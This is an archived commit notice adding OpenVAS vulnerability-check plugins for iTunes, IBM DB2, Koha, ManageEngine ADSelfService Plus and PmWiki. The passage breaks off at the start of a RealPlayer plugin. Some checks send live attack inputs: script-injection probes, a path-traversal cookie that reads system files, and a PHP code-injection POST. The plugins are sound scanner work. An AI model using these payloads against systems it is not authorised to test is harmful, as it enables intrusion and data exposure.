[Openvas-commits] r12227 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Nov 30 16:19:11 CET 2011


Author: antu123
Date: 2011-11-30 16:19:06 +0100 (Wed, 30 Nov 2011)
New Revision: 12227

Added:
   trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/ChangeLog	2011-11-30 15:19:06 UTC (rev 12227)
@@ -1,3 +1,20 @@
+2011-11-30  Antu Sanadi <santu at secpod.com>
+
+	* scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl,
+	scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl,
+	scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl,
+	scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl,
+	scripts/secpod_vmware_fusion_detect_macosx.nasl,
+	scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl,
+	scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl,
+	scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl,
+	scripts/secpod_realplayer_mult_vuln_nov11_win.nasl,
+	scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl,
+	scripts/secpod_koha_opac_mult_xss_vuln.nasl,
+	scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl,
+	scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl:
+	Added new plugins.
+
 2011-11-30  Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/gb_sit_50742.nasl,

Added: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apple iTunes Remote Code Execution Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902639);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-0259");
+  script_bugtraq_id(50672);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-28 16:04:18 +0530 (Mon, 28 Nov 2011)");
+  script_name("Apple iTunes Remote Code Execution Vulnerability (Mac OS X)");
+  desc = "
+  Overview: This host is installed with Apple iTunes and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the improper verification of authenticity of
+  updates, allows man-in-the-middle attack execute arbitrary code via a
+  Trojan horse update.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code in
+  the context of the user running the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Apple iTunes version prior to 10.5.1
+
+  Fix: Upgrade to Apple Apple iTunes version 10.5.1 or later,
+  For updates refer, http://www.apple.com/itunes/download/
+
+  References:
+  http://support.apple.com/kb/HT5030
+  http://support.apple.com/kb/HT4981
+  http://lists.apple.com/archives/security-announce/2011/Nov/msg00003.html ";
+
+  script_description(desc);
+  script_summary("Check for apple iTunes version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Mac OS X Local Security Checks");
+  script_dependencies("secpod_itunes_detect_macosx.nasl");
+  script_require_keys("Apple/iTunes/MacOSX/Version");
+  exit(0);
+}
+
+include("version_func.inc");
+
+## Get Apple iTunes version from KB
+itunesVer = get_kb_item("Apple/iTunes/MacOSX/Version");
+if(itunesVer)
+{
+  ## Check for Apple iTunes versions < 10.5.1
+  if(version_is_less(version:itunesVer, test_version:"10.5.1")){
+    security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apple iTunes Remote Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902638);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-0259");
+  script_bugtraq_id(50672);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-28 15:07:07 +0530 (Mon, 28 Nov 2011)");
+  script_name("Apple iTunes Remote Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: This host is installed with Apple iTunes and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the improper verification of authenticity of
+  updates, allows man-in-the-middle attack execute arbitrary code via a
+  Trojan horse update.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code in
+  the context of the user running the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Apple iTunes version prior to 10.5.1 (10.5.1.42)
+
+  Fix: Upgrade to Apple Apple iTunes version 10.5.1 or later,
+  For updates refer, http://www.apple.com/itunes/download/
+
+  References:
+  http://support.apple.com/kb/HT5030
+  http://support.apple.com/kb/HT4981
+  http://lists.apple.com/archives/security-announce/2011/Nov/msg00003.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Apple iTunes");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("secpod_apple_itunes_detection_win_900123.nasl");
+  script_require_keys("iTunes/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+ituneVer= get_kb_item("iTunes/Win/Ver");
+if(!ituneVer){
+  exit(0);
+}
+
+## Apple iTunes version < 10.5.1 (10.5.1.42)
+if(version_is_less(version:ituneVer, test_version:"10.5.1.42")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# IBM DB2 'DT_RPATH' Insecure Library Loading Code Execution Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902489);
+  script_version("$Revision$");
+  script_bugtraq_id(48514);
+  script_cve_id("CVE-2011-4061");
+  script_tag(name:"cvss_base", value:"6.9");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-08 15:07:48 +0530 (Tue, 08 Nov 2011)");
+  script_name("IBM DB2 'DT_RPATH' Insecure Library Loading Code Execution Vulnerabilities");
+  desc = "
+  Overview: The host is running IBM DB2 and is prone to insecure library
+  loading vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to an error in 'db2rspgn' and 'kbbacf1', which allow
+  users to gain privileges via a Trojan horse libkbb.so in the current working
+  directory.
+
+  Impact: Successful exploitation allows local unauthenticated users to gain
+  elevated privileges and execute arbitrary code with root privileges.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  IBM DB2 version 9.7
+
+  Fix: No solution or patch is available as on 30th, November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053
+
+  References:
+  http://www.securityfocus.com/archive/1/518659
+  http://www.nth-dimension.org.uk/downloads.php?id=77
+  http://www.nth-dimension.org.uk/downloads.php?id=83 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM DB2");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Databases");
+  script_dependencies("gb_ibm_db2_remote_detect.nasl");
+  script_require_keys("IBM-DB2/Remote/ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+ibmVer = get_kb_item("IBM-DB2/Remote/ver");
+if(!ibmVer){
+  exit(0);
+}
+
+if(ibmVer =~ "^0907\.*")
+{
+  # IBM DB2 9.7 => 09000
+  if(version_is_equal(version:ibmVer, test_version:"09000"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,112 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Koha Library Software OPAC Multiple Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902640);
+  script_version("$Revision$");
+  script_bugtraq_id(48895);
+  script_tag(name:"cvss_base", value:"4.5");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-30 11:26:06 +0530 (Wed, 30 Nov 2011)");
+  script_name("Koha Library Software OPAC Multiple Cross Site Scripting Vulnerabilities");
+  desc = "
+  Overview: The host is running Koha Library Software and is prone to multiple
+  cross-site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to improper validation of user-supplied input in
+  'bib_list' parameter to opac-downloadcart.pl, 'biblionumber' parameter to
+  opac-serial-issues.pl, opac-addbybiblionumber.pl, opac-review.pl and
+  'shelfid' parameter to opac-sendshelf.pl and opac-downloadshelf.pl.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Koha Library Software versions 3.4.1 and prior.
+
+  Fix: Upgrade to Koha Library Software version 3.4.2 or later,
+  For updates refer, http://koha-community.org/
+
+  References:
+  http://secunia.com/advisories/45435/
+  http://koha-community.org/koha-3-4-2/
+  http://en.securitylab.ru/lab/PT-2011-05
+  http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6518
+  http://packetstormsecurity.org/files/view/103440/PT-2011-05.txt
+  http://osvdb.org/vendor/118855-koha-library-software-community/1 ";
+
+  script_description(desc);
+  script_summary("Check if Koha Library Software is vulnerable to XSS");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+port = get_http_port(default:80);
+
+## Check port state
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Iterate over possible paths
+foreach dir (make_list("/", "/koha", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: dir + "/opac-main.pl", port:port);
+  res = http_send_recv(port:port, data:req);
+
+  ## Confirm the application before trying exploit
+  if("koha" >< res && "Library" >< res)
+  {
+    ## Construct the attack request
+    url = string(dir, '/koha/opac-review.pl?biblionumber="<script>alert' +
+                      '(document.cookie)</script>');
+
+    ## Try attack and check the response to confirm vulnerability
+    if(http_vuln_check(port:port, url:url, pattern:"<script>alert" +
+                       "\(document.cookie\)</script>"))
+    {
+      security_warning(port);
+      exit(0);
+    }
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,120 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# LibLime Koha 'KohaOpacLanguage' Parameter Local File Inclusion Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902593);
+  script_version("$Revision$");
+  script_bugtraq_id(50812);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-29 17:17:17 +0530 (Tue, 29 Nov 2011)");
+  script_name("LibLime Koha 'KohaOpacLanguage' Parameter Local File Inclusion Vulnerability");
+  desc = "
+  Overview: The host is running LibLime Koha and is prone to local file
+  inclusion vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the cgi-bin/opac/opac-main.pl script not properly
+  sanitizing user input supplied to the cgi-bin/koha/mainpage.pl script via
+  the 'KohaOpacLanguage' cookie. This can be exploited to include arbitrary
+  files from local resources via directory traversal attacks and URL-encoded
+  NULL bytes.
+
+  Impact:
+  Successful exploitation will allow remote attackers to obtain potentially
+  sensitive information and execute arbitrary local scripts in the context of
+  the Web server process.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  LibLime Koha versions 4.02.06 and prior.
+
+  Fix: No solution or patch is available as on 29th, November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.koha.org
+
+  References:
+  http://osvdb.org/show/osvdb/77322
+  http://secunia.com/advisories/46980/
+  http://www.exploit-db.com/exploits/18153
+  http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability&lnk=exploits/18153 ";
+
+  script_description(desc);
+  script_summary("Check if LibLime Koha is vulnerable to local file inclusion");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Iterate over possible paths
+foreach dir (make_list(cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: dir + "/koha/opac-main.pl", port:port);
+  res = http_send_recv(port:port, data:req);
+
+  ## Confirm the application before trying exploit
+  if("koha" >< res && "Library" >< res)
+  {
+    files = traversal_files();
+
+    foreach file (keys(files))
+    {
+      ## Construct Directory Traversal Attack,
+      cookie = "sessionID=1;KohaOpacLanguage=../../../../../../../../" +
+               files[file] + "%00";
+      req1 = string(chomp(req), '\r\nCookie: ', cookie, '\r\n\r\n');
+
+      ## Send exploit
+      res = http_send_recv(port:port, data:req1);
+
+      ## Check the response to confirm vulnerability
+      if(egrep(pattern:file, string:res))
+      {
+        security_hole(port);
+        exit(0);
+      }
+    }
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,101 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Zoho ManageEngine ADSelfService Plus Cross Site Scripting Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902757);
+  script_version("$Revision$");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-18 11:15:15 +0530 (Fri, 18 Nov 2011)");
+  script_name("Zoho ManageEngine ADSelfService Plus Cross Site Scripting Vulnerability");
+  desc = "
+  Overview: This host is running Zoho ManageEngine ADSelfService Plus and is
+  prone to cross site scripting vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error in corporate directory search feature, which
+  allows remote attackers to cause XSS attacks.
+
+  Impact:
+  Successful exploitation will let the attacker to terminate javascript
+  variable declarations, escape encapsulation, and append arbitrary javascript
+  code.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  ManageEngine ADSelfServicePlus version 4.5 Build 4521
+
+  Fix: No solution or patch is available as on 18th, November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.manageengine.co.in/products/self-service-password/download.html
+
+  References:
+  http://www.securityfocus.com/archive/1/520562
+  http://packetstormsecurity.org/files/107093/vrpth-2011-001.txt ";
+
+  script_description(desc);
+  script_summary("Check if Zoho ManageEngine ADSelfService Plus is prone to XSS");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:8888);
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+foreach dir (make_list("/", "/manageengine", cgi_dirs()))
+{
+  sndReq = http_get(item:string(dir , "/EmployeeSearch.cc"), port:port);
+  rcvRes = http_send_recv(port:port, data:sndReq);
+
+  ## Confirm the application
+  if("<title>ManageEngine - ADSelfService Plus</title>" >< rcvRes)
+  {
+    ## Construct attack
+    url = string (dir + '/EmployeeSearch.cc?searchType=contains&searchBy=' +
+                    'ALL_FIELDS&searchString=";alert(document.cookie);"');
+
+    ## Confirm exploit worked properly or not
+    if(http_vuln_check(port:port, url:url, pattern:";alert\(document.cookie\);"))
+    {
+      security_warning(port:port);
+      exit(0);
+    }
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,138 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PmWiki Pagelist 'order' Parameter PHP Code Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902592);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4453");
+  script_bugtraq_id(50776);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-28 13:13:13 +0530 (Mon, 28 Nov 2011)");
+  script_name("PmWiki Pagelist 'order' Parameter PHP Code Injection Vulnerability");
+  desc = "
+  Overview: The host is running PmWiki and is prone to PHP code injection
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper validation of user-supplied input via
+  the 'order' argument of a pagelist directive within a PmWiki page, which
+  allows attackers to execute arbitrary PHP code.
+
+  Impact:
+  Successful exploitation will allow remote attackers to inject and execute
+  arbitrary PHP code in the context of the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  PmWiki versions 2.0.0 to 2.2.34
+
+  Fix: Upgrade to PmWiki version 2.2.35 or later,
+  For updates refer, http://pmwiki.org/pub/pmwiki
+
+  References:
+  http://osvdb.org/show/osvdb/77261
+  http://secunia.com/advisories/46968
+  http://www.pmwiki.org/wiki/PITS/01271
+  http://www.exploit-db.com/exploits/18149
+  http://www.securityfocus.com/archive/1/520631
+  http://www.pmwiki.org/wiki/PmWiki/ChangeLog#v2235 ";
+
+  script_description(desc);
+  script_summary("Check if PmWiki is vulnerable to PHP code injection");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_dependencies("gb_pmwiki_detect.nasl");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(! get_port_state(port)) {
+  exit(0);
+}
+
+## Check Host Supports PHP
+if(! can_host_php(port:port)){
+  exit(0);
+}
+
+## Get Host Name
+host = get_host_name();
+if(! host){
+  exit(0);
+}
+
+## Get PmWiki Location
+if(!dir = get_dir_from_kb(port:port, app:"PmWiki")){
+  exit(0);
+}
+
+## Construct Attack Request
+url = dir + "/pmwiki.php";
+postData = "action=edit&post=save&n=Cmd.Shell&text=(:pagelist order=']);" +
+           "phpinfo();die;#:)";
+
+req = string("POST ", url, " HTTP/1.1\r\n",
+             "Host: ", host, "\r\n",
+             "Content-Type: application/x-www-form-urlencoded\r\n",
+             "Content-Length: ", strlen(postData), "\r\n",
+             "\r\n", postData);
+
+## Send crafted POST request and receive the response
+res = http_keepalive_send_recv(port:port, data:req);
+
+if(res =~ "HTTP/1.. 30")
+{
+  ## Confirm exploit worked by checking the response
+  path = url + "?n=Cmd.Shell";
+  if(http_vuln_check(port:port, url:path, pattern:">phpinfo\(\)<"))
+  {
+    ## Clean the pmwiki.php on success by sending empty POST
+    postData = "action=edit&post=save&n=Cmd.Shell&text=";
+    req = string("POST ", url, " HTTP/1.1\r\n",
+                 "Host: ", host, "\r\n",
+                 "Content-Type: application/x-www-form-urlencoded\r\n",
+                 "Content-Length: ", strlen(postData), "\r\n",
+                 "\r\n", postData);
+
+    res = http_keepalive_send_recv(port:port, data:req);
+
+    security_hole(port);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Mac OS X)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
